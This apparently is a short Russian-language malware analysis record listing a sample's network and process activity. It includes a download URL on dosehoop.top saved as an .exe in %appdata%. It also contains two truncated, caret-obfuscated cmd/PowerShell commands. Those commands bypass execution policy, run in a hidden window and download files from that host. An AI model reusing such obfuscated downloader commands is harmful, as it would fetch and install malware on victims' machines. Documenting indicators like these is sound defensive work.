Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERsHeLL^.^e^Xe^ ^-eXEcution^p^OliC^Y ^b^y^P^as^S ^-nOPR^oF^ILE^ ^-w^inDowsTYlE HIDdEn^ (new-Obj^E^Ct SY^StE^M^.NeT.weB^C^lI^eN^T)^.^d^O^WNL^oaDFI^L^e(^'http://dosehoop.t...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "POwERsHeLL^.^e^Xe^ ^-eXEcution^p^OliC^Y ^b^y^P^as^S ^-nOPR^oF^ILE^ ^-w^inDowsTYlE HIDdEn^ (new-Obj^E^Ct SY^StE^M^.NeT.weB^C^lI^eN^T)^.^d^O^WNL^oaDFI^L^e(^'http://dosehoop.t...' (со скрытым окном)